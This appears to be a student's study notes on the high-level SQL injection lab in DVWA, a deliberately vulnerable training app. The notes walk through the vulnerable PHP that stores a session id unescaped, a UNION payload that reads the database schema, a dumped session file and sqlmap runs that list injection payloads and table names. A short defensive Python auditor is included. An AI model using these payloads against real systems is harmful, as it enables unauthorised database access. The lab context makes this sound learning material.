2019-2-26 DVWA study notes (3): SQL injection at the high level, and sessions


[Figure 1]

On the high level page, clicking "here to change your ID" opens a second page (session-input.php). Enter 3 there and submit; the data then appears on the main page.

[Figure 2]

```php
// index.php (high level). The link markup was stripped during extraction; the onclick handler opens session-input.php in a pop-up
$page[ 'body' ] .= "<p>Click <a href=\"#\" onclick=\"javascript:popUp('session-input.php');return false;\">here to change your ID</a>.</p>";
```

The code above makes the click on "here to change your ID" open the session-input.php page.


```php
<?php
// session-input.php (high level), reconstructed: the HTML markup was stripped during extraction
if( isset( $_POST[ 'id' ] ) ) {
    $_SESSION[ 'id' ] = $_POST[ 'id' ];   // stored server-side as-is: no validation, no escaping
    $page[ 'body' ] .= "Session ID: {$_SESSION[ 'id' ]}<br /><br /><br />";
    $page[ 'body' ] .= "<script>window.opener.location.reload(true);</script>";   // refresh the main page
}
$page[ 'body' ] .= "<form action=\"#\" method=\"POST\"><input type=\"text\" size=\"15\" name=\"id\"><input type=\"submit\" name=\"Submit\" value=\"Submit\"></form>";
dvwaSourceHtmlEcho( $page );
?>
```

3. If $_POST['id'] is set, it is assigned to the predefined $_SESSION['id']. Session data is kept on the server. Note: at this point the session holds the following value:

```sql
1' union select column_name,column_type from information_schema.columns where table_name='users' and table_schema='dvwa'#
```


```text
root@1cae08f0d608:/var/lib/php/sessions# ls -l
total 4
-rw------- 1 www-data www-data 246 Feb 27 01:09 sess_mtnslp6slj5aup7n1tqh2ouc72
root@1cae08f0d608:/var/lib/php/sessions# cat sess_mtnslp6slj5aup7n1tqh2ouc72
dvwa|a:2:{s:8:"messages";a:0:{}s:8:"username";s:5:"admin";}id|s:121:"1' union select column_name,column_type from information_schema.columns where table_name='users' and table_schema='dvwa'#";session_token|s:32:"b6bc30f8d87d2e146baaff5e5a1c
```

4. Displaying the Session ID on the page:


```php
// index.php: loads the source file matching the current security level (high.php here)
require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/sqli/source/{$vulnerabilityFile}";
```

```php
<?php
// high.php, reconstructed: the lines before the die() message were lost during extraction
if( isset( $_SESSION[ 'id' ] ) ) {
    $id = $_SESSION[ 'id' ];   // set by session-input.php; not escaped, not checked to be numeric
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query( $GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
    while( $row = mysqli_fetch_assoc( $result ) ) {
        $first = $row["first_name"];
        $last  = $row["last_name"];
        $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";   // feedback for end user
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
```

Here, the database query runs whenever $_SESSION['id'] exists. In step 1 there is no $_SESSION['id'], so nothing runs; in step 2, session-input.php has stored $_SESSION['id'], and from then on the query executes.

The high level query is actually less safe than the medium level: it does not escape special characters with mysqli_real_escape_string. Its only restriction is "LIMIT 1" to cap the number of rows displayed, and that is trivially neutralised by an injected "#", which turns the rest of the query into a comment.
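Two things shown above deserve a hands-on look from the defender's side: the payload lives in the server-side session file in PHP's serialize format, and high.php trusts whatever that file holds. The Python below is an added example (not DVWA code): it parses a session file in that format and applies the positive-integer check that session-input.php should apply before storing id, so the same function can audit existing session files. The sample session is constructed to match the dump above; its session_token is a made-up placeholder.

```python
import re

# Constructed sample in the layout of /var/lib/php/sessions/sess_<id> (php serialize handler):
# "<name>|<serialized value>" entries back to back. The id payload is the one from the dump
# above; the session_token is a made-up placeholder.
SAMPLE = (
    b'dvwa|a:2:{s:8:"messages";a:0:{}s:8:"username";s:5:"admin";}'
    b'id|s:121:"1\' union select column_name,column_type from information_schema.columns'
    b' where table_name=\'users\' and table_schema=\'dvwa\'#";'
    b'session_token|s:32:"PLACEHOLDER_TOKEN_0123456789abcd";'
)

def _parse_value(buf, pos):
    """Parse one serialized PHP value at pos; return (value, position after it)."""
    tag = chr(buf[pos])
    if tag in 'ibd':                                 # i:123;  b:1;  d:1.5;
        end = buf.index(b';', pos)
        return {'i': int, 'b': lambda v: v == '1', 'd': float}[tag](buf[pos + 2:end].decode()), end + 1
    colon = buf.index(b':', pos + 2)
    n, start = int(buf[pos + 2:colon]), colon + 2    # skip ':"' (string) or ':{' (array)
    if tag == 's':                                   # s:<bytelen>:"<bytes>"; the length delimits it,
        if buf[start + n:start + n + 2] != b'";':    # so quotes, ';' and '#' inside the value are inert
            raise ValueError(f'bad string terminator at {start + n}')
        return buf[start:start + n].decode('utf-8', 'replace'), start + n + 2
    if tag == 'a':                                   # a:<count>:{key value key value ...}
        out, pos = {}, start
        for _ in range(n):
            key, pos = _parse_value(buf, pos)
            out[key], pos = _parse_value(buf, pos)
        if buf[pos:pos + 1] != b'}':
            raise ValueError(f'unterminated array at {pos}')
        return out, pos + 1
    raise ValueError(f'unsupported type {tag!r} at {pos}')

def parse_session(buf):
    """Split a session file into {name: value}; values keep their PHP types."""
    pos, session = 0, {}
    while pos < len(buf):
        bar = buf.index(b'|', pos)
        name = buf[pos:bar].decode()
        session[name], pos = _parse_value(buf, bar + 1)
    return session

def audit_id(session):
    """The check session-input.php never applies: a user_id is a positive integer, nothing else.
    Returns 'absent', 'ok' or 'reject'; a rejected value is exactly what high.php would otherwise
    splice unescaped into its SELECT, where a trailing '#' comments out the LIMIT 1."""
    raw = session.get('id')
    if raw is None:
        return 'absent'
    return 'ok' if isinstance(raw, str) and re.fullmatch(r'[1-9][0-9]{0,9}', raw) else 'reject'
```

Run over a real sessions directory, `audit_id(parse_session(open(path, 'rb').read()))` flags every stored id that is not a plain user number, which is the second-order payload the write-up plants.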



[Figure 3]


```text
C:\Python27\sqlmap>sqlmap.py -u "" --data "id=1 & Submit=Submit " --cookie "PHPSESSID=mtnslp6slj5aup7n1tqh2ouc72; security=high" --batch -D dvwa --tables
 ___ ___[(]_____ ___ ___  {}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:14:27 /2019-02-26/

[17:14:27] [INFO] resuming back-end DBMS 'mysql'
[17:14:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (1426=1426) THEN 1 ELSE (SELECT 4462 UNION SELECT 4808) END))&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5505 FROM(SELECT COUNT(*),CONCAT(0x71786a6271,(SELECT (ELT(5505=5505,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x71786a6271,0x597353525655566d6d4577594e7a79776b7863416a6e6d4c50654f50676d457a4979794759456458,0x717a6b6b71),NULL-- HLAr&Submit=Submit
[17:14:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
[17:14:27] [INFO] fetching tables for database: 'dvwa'
[17:14:27] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [INFO] fetching number of tables for database 'dvwa'
[17:14:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:14:27] [INFO] retrieved:
[17:14:27] [WARNING] time-based comparison requires larger statistical model, please wait............ (done)
[17:14:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[17:14:27] [WARNING] unable to retrieve the number of tables for database 'dvwa'
[17:14:28] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[17:14:28] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\'

[*] ending @ 17:14:28 /2019-02-26/
```




```text
C:\Python27\sqlmap>sqlmap.py -u "" --second-url "" --data "id=1 & Submit=Submit " --cookie "PHPSESSID=mtnslp6slj5aup7n1tqh2ouc72; security=high" -D dvwa -T users --tables --batch
 ___ ___[']_____ ___ ___  {}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:48:31 /2019-02-27/

[15:48:32] [INFO] resuming back-end DBMS 'mysql'
[15:48:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=a'' ' UNION ALL SELECT CONCAT(CONCAT('qkzpq','AnAobpxMEVvrQhDbPUwYvCTponUepPqCpwoBwMDl'),'qpqqq'),NULL-- weNx& Submit=Submit
[15:48:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL 5 (MariaDB fork)
[15:48:32] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
| guestbook |
| users     |

[15:48:32] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\'

[*] ending @ 15:48:32 /2019-02-27/
```

